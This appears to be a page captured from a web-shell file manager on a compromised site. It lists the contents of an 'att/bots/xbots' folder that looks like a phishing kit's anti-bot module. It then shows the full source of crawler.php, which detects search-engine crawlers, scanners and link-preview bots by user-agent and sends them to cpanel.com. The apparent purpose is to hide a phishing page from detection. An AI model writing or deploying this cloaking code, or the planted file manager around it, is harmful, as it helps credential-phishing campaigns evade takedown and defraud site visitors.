at path:
ROOT
/
att
/
bots
/
xbots
/
crawler.php
run:
R
W
Run
anti.php
0 By
2022-01-02 07:21:24
R
W
Run
Delete
Rename
blacklist.dat
30.08 KB
2019-09-27 11:31:38
R
W
Run
Delete
Rename
bot.php
36.88 KB
2021-03-01 17:49:54
R
W
Run
Delete
Rename
cb70.ini
71 By
2021-12-24 03:29:04
R
W
Run
Delete
Rename
crawler.php
924 By
2021-04-02 02:07:36
R
W
Run
Delete
Rename
index.php
2 By
2021-11-29 11:37:10
R
W
Run
Delete
Rename
myz.php
739 By
2021-04-02 02:08:48
R
W
Run
Delete
Rename
yeahbb.php
2.41 KB
2021-12-25 22:28:20
R
W
Run
Delete
Rename
error_log
up
📄
crawler.php
Save
<?php if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') or strpos($_SERVER['HTTP_USER_AGENT'], 'Java') or strpos($_SERVER['HTTP_USER_AGENT'], 'FreeBSD') or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) { exit(header("Location: https://www.cpanel.com")); die(); } if ($_SERVER['HTTP_USER_AGENT'] == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") { exit(header("Location: https://www.cpanel.com")); die(); } ?>